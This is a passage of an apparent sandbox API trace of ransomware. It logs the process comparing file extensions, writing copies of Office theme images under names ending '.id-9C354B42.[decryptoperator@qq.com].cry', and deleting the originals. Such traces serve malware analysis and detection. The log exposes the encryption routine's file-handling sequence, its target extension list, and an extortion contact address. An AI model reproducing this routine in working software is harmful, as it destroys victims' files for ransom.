(lpString=".7z") returned 3 [0047.004] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0047.004] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF") returned 72 [0047.004] lstrlenW (lpString=".dbf") returned 4 [0047.004] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0047.004] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF") returned 72 [0047.004] lstrlenW (lpString=".1cd") returned 4 [0047.004] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0047.004] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF") returned 72 [0047.004] lstrlenW (lpString=".jpg") returned 4 [0047.004] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0047.005] lstrcmpiW (lpString1=".GIF", lpString2=".cry") returned 1 [0047.005] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0047.005] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0047.005] GetFileSizeEx (in: hFile=0x1bc, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=1423) returned 1 [0047.005] CloseHandle (hObject=0x1bc) returned 1 [0047.005] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\preview.gif")) returned 0x20 [0047.005] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\preview.gif.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0047.005] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0047.006] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.006] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.006] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\preview.gif.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0047.007] GetLastError () returned 0x0 [0047.007] ReadFile (in: hFile=0x1bc, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x58f, lpOverlapped=0x0) returned 1 [0047.029] WriteFile (in: hFile=0x204, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0x590, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x590, lpOverlapped=0x0) returned 1 [0047.030] ReadFile (in: hFile=0x1bc, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0047.030] WriteFile (in: hFile=0x204, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xea, lpOverlapped=0x0) returned 1 [0047.030] SetEndOfFile (hFile=0x204) returned 1 [0047.030] CloseHandle (hObject=0x204) returned 1 [0047.030] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.030] SetEndOfFile (hFile=0x1bc) returned 1 [0047.031] CloseHandle (hObject=0x1bc) returned 1 [0047.031] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0047.031] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\preview.gif")) returned 1 [0047.031] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF") returned 75 [0047.031] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF") returned 75 [0047.031] lstrlenW (lpString=".doc") returned 4 [0047.031] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0047.031] lstrlenW (lpString=".docx") returned 5 [0047.031] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0047.031] lstrlenW (lpString=".pdf") returned 4 [0047.031] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0047.031] lstrlenW (lpString=".xls") returned 4 [0047.031] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0047.031] lstrlenW (lpString=".xlsx") returned 5 [0047.031] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0047.031] lstrlenW (lpString=".ppt") returned 4 [0047.031] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0047.031] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF") returned 75 [0047.032] lstrlenW (lpString=".zip") returned 4 [0047.032] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0047.032] lstrlenW (lpString=".rar") returned 4 [0047.032] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0047.032] lstrlenW (lpString=".bz2") returned 4 [0047.032] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0047.032] lstrlenW (lpString=".7z") returned 3 [0047.032] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0047.032] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF") returned 75 [0047.032] lstrlenW (lpString=".dbf") returned 4 [0047.032] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0047.032] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF") returned 75 [0047.032] lstrlenW (lpString=".1cd") returned 4 [0047.032] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0047.032] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF") returned 75 [0047.032] lstrlenW (lpString=".jpg") returned 4 [0047.032] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0047.032] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF") returned 75 [0047.032] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF") returned 75 [0047.032] lstrlenW (lpString=".doc") returned 4 [0047.032] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0047.032] lstrlenW (lpString=".docx") returned 5 [0047.032] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0047.032] lstrlenW (lpString=".pdf") returned 4 [0047.032] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0047.032] lstrlenW (lpString=".xls") returned 4 [0047.032] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0047.032] lstrlenW (lpString=".xlsx") returned 5 [0047.032] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0047.032] lstrlenW (lpString=".ppt") returned 4 [0047.032] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0047.032] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF") returned 75 [0047.032] lstrlenW (lpString=".zip") returned 4 [0047.032] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0047.032] lstrlenW (lpString=".rar") returned 4 [0047.032] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0047.032] lstrlenW (lpString=".bz2") returned 4 [0047.033] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0047.033] lstrlenW (lpString=".7z") returned 3 [0047.033] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0047.033] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF") returned 75 [0047.033] lstrlenW (lpString=".dbf") returned 4 [0047.033] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0047.033] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF") returned 75 [0047.033] lstrlenW (lpString=".1cd") returned 4 [0047.033] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0047.033] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF") returned 75 [0047.033] lstrlenW (lpString=".jpg") returned 4 [0047.033] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0047.033] lstrcmpiW (lpString1=".GIF", lpString2=".cry") returned 1 [0047.033] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0047.033] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0047.033] GetFileSizeEx (in: hFile=0x1bc, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=3970) returned 1 [0047.033] CloseHandle (hObject=0x1bc) returned 1 [0047.035] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\preview.gif")) returned 0x20 [0047.035] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\preview.gif.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0047.035] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0047.035] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.035] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.035] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\preview.gif.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0047.037] GetLastError () returned 0x0 [0047.037] ReadFile (in: hFile=0x1bc, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0xf82, lpOverlapped=0x0) returned 1 [0047.275] WriteFile (in: hFile=0x204, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0xf90, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xf90, lpOverlapped=0x0) returned 1 [0047.276] ReadFile (in: hFile=0x1bc, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0047.276] WriteFile (in: hFile=0x204, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xea, lpOverlapped=0x0) returned 1 [0047.276] SetEndOfFile (hFile=0x204) returned 1 [0047.276] CloseHandle (hObject=0x204) returned 1 [0047.276] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.276] SetEndOfFile (hFile=0x1bc) returned 1 [0047.277] CloseHandle (hObject=0x1bc) returned 1 [0047.277] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0047.277] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\preview.gif")) returned 1 [0047.277] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF") returned 76 [0047.277] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF") returned 76 [0047.278] lstrlenW (lpString=".doc") returned 4 [0047.278] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0047.278] lstrlenW (lpString=".docx") returned 5 [0047.278] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0047.278] lstrlenW (lpString=".pdf") returned 4 [0047.278] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0047.278] lstrlenW (lpString=".xls") returned 4 [0047.278] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0047.278] lstrlenW (lpString=".xlsx") returned 5 [0047.278] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0047.278] lstrlenW (lpString=".ppt") returned 4 [0047.278] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0047.278] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF") returned 76 [0047.278] lstrlenW (lpString=".zip") returned 4 [0047.278] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0047.278] lstrlenW (lpString=".rar") returned 4 [0047.278] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0047.278] lstrlenW (lpString=".bz2") returned 4 [0047.278] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0047.278] lstrlenW (lpString=".7z") returned 3 [0047.278] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0047.278] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF") returned 76 [0047.278] lstrlenW (lpString=".dbf") returned 4 [0047.278] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0047.278] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF") returned 76 [0047.278] lstrlenW (lpString=".1cd") returned 4 [0047.278] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0047.278] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF") returned 76 [0047.278] lstrlenW (lpString=".jpg") returned 4 [0047.278] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0047.278] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF") returned 76 [0047.278] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF") returned 76 [0047.278] lstrlenW (lpString=".doc") returned 4 [0047.278] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0047.278] lstrlenW (lpString=".docx") returned 5 [0047.278] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0047.278] lstrlenW (lpString=".pdf") returned 4 [0047.278] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0047.278] lstrlenW (lpString=".xls") returned 4 [0047.279] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0047.279] lstrlenW (lpString=".xlsx") returned 5 [0047.279] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0047.279] lstrlenW (lpString=".ppt") returned 4 [0047.279] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0047.279] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF") returned 76 [0047.279] lstrlenW (lpString=".zip") returned 4 [0047.279] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0047.279] lstrlenW (lpString=".rar") returned 4 [0047.279] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0047.279] lstrlenW (lpString=".bz2") returned 4 [0047.279] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0047.279] lstrlenW (lpString=".7z") returned 3 [0047.279] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0047.279] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF") returned 76 [0047.279] lstrlenW (lpString=".dbf") returned 4 [0047.279] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0047.279] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF") returned 76 [0047.279] lstrlenW (lpString=".1cd") returned 4 [0047.279] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0047.279] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF") returned 76 [0047.279] lstrlenW (lpString=".jpg") returned 4 [0047.279] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0047.279] lstrcmpiW (lpString1=".PNG", lpString2=".cry") returned 1 [0047.279] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0047.279] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0047.280] GetFileSizeEx (in: hFile=0x1bc, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=47962) returned 1 [0047.280] CloseHandle (hObject=0x1bc) returned 1 [0047.280] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\thmbnail.png")) returned 0x20 [0047.280] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\thmbnail.png.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0047.280] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0047.280] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.280] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.280] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\thmbnail.png.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0047.280] GetLastError () returned 0x0 [0047.280] ReadFile (in: hFile=0x1bc, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0xbb5a, lpOverlapped=0x0) returned 1 [0047.353] WriteFile (in: hFile=0x204, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0xbb60, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xbb60, lpOverlapped=0x0) returned 1 [0047.362] ReadFile (in: hFile=0x1bc, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0047.363] WriteFile (in: hFile=0x204, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0047.363] SetEndOfFile (hFile=0x204) returned 1 [0047.363] CloseHandle (hObject=0x204) returned 1 [0047.363] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.363] SetEndOfFile (hFile=0x1bc) returned 1 [0047.759] CloseHandle (hObject=0x1bc) returned 1 [0047.759] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0047.760] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\thmbnail.png")) returned 1 [0047.760] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG") returned 76 [0047.760] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG") returned 76 [0047.760] lstrlenW (lpString=".doc") returned 4 [0047.760] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0047.760] lstrlenW (lpString=".docx") returned 5 [0047.760] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0047.760] lstrlenW (lpString=".pdf") returned 4 [0047.760] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0047.760] lstrlenW (lpString=".xls") returned 4 [0047.760] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0047.760] lstrlenW (lpString=".xlsx") returned 5 [0047.760] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0047.760] lstrlenW (lpString=".ppt") returned 4 [0047.760] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0047.760] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG") returned 76 [0047.760] lstrlenW (lpString=".zip") returned 4 [0047.760] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0047.760] lstrlenW (lpString=".rar") returned 4 [0047.760] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0047.760] lstrlenW (lpString=".bz2") returned 4 [0047.760] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0047.760] lstrlenW (lpString=".7z") returned 3 [0047.760] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0047.760] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG") returned 76 [0047.760] lstrlenW (lpString=".dbf") returned 4 [0047.760] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0047.760] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG") returned 76 [0047.760] lstrlenW (lpString=".1cd") returned 4 [0047.760] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0047.761] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG") returned 76 [0047.761] lstrlenW (lpString=".jpg") returned 4 [0047.761] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0047.761] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG") returned 76 [0047.761] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG") returned 76 [0047.761] lstrlenW (lpString=".doc") returned 4 [0047.761] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0047.761] lstrlenW (lpString=".docx") returned 5 [0047.761] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0047.761] lstrlenW (lpString=".pdf") returned 4 [0047.761] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0047.761] lstrlenW (lpString=".xls") returned 4 [0047.761] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0047.761] lstrlenW (lpString=".xlsx") returned 5 [0047.761] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0047.761] lstrlenW (lpString=".ppt") returned 4 [0047.761] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0047.761] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG") returned 76 [0047.761] lstrlenW (lpString=".zip") returned 4 [0047.761] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0047.761] lstrlenW (lpString=".rar") returned 4 [0047.761] lstrcmpiW (lpString1=".rar", 